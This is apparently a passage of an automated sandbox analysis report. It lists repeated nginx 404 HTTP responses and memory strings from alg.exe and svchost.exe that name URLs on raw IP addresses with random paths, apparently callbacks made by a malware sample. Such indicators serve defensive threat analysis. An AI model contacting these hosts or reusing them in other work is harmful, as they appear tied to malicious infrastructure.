              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:29:34 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:29:50 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:29:50 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:31:44 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:31:44 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:31:51 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:31:51 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: alg.exe, 00000008.00000003.2316109693.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/
              Source: alg.exe, 00000008.00000003.2316109693.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/3
              Source: svchost.exe, 00000006.00000003.2551581839.00000000030A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2550628200.00000000030A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/hrvgX
              Source: alg.exe, 00000008.00000003.2431200193.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2416150637.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2440149146.0000000000573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/jaumpxrl
              Source: alg.exe, 00000008.00000003.2316109693.0000000000530000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2316109693.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/scwkixjormncu
              Source: alg.exe, 00000008.00000003.2316109693.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/scwkixjormncus
              Source: svchost.exe, 00000006.00000003.2551581839.00000000030A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2550628200.00000000030A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/hqdytjqsnbtC
              Source: svchost.exe, 00000006.00000003.2551581839.00000000030A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2550628200.00000000030A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/hrvgrobat
              Source: svchost.exe, 00000006.00000003.2551441037.000000000307D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552020416.0000000003082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20/ptbejgswjfxl
              Source: alg.exe, 00000008.00000003.2361537798.000000000057E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/d
              Source: alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/
              Source: alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/$
              Source: alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/0
              Source: svchost.exe, 00000006.00000003.2395862116.000000000307A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/atyxaeuca
              Source: svchost.exe, 00000006.00000003.2395862116.000000000307A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/dgcyhyi
              Source: alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/nljwtdwahh
              Source: alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/nljwtdwahhgs
              Source: alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/t
              Source: alg.exe, 00000008.00000003.2251017479.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2033579316.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143:80/xjjg
              Source: alg.exe, 00000008.00000003.2614951526.0000000000590000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1922932295.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2573297149.000000000058F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905150358.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2564994395.000000000058E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2599053354.000000000058F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905662972.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
              Source: alg.exe, 00000008.00000003.1922932295.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905150358.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905662972.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/aky
              Source: alg.exe, 00000008.00000003.1904970187.000000000055E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/aky.177/dq
              Source: alg.exe, 00000008.00000003.1905150358.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905662972.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/akyttings
              Source: alg.exe, 00000008.00000003.2531077401.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/bc
              Source: svchost.exe, 00000006.00000003.2551441037.000000000307D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552020416.0000000003082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/dxsssktqcq
              Source: alg.exe, 00000008.00000003.3137092544.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3163550787.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3142560146.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3154349720.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3149933208.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ekoddjskuurntxll
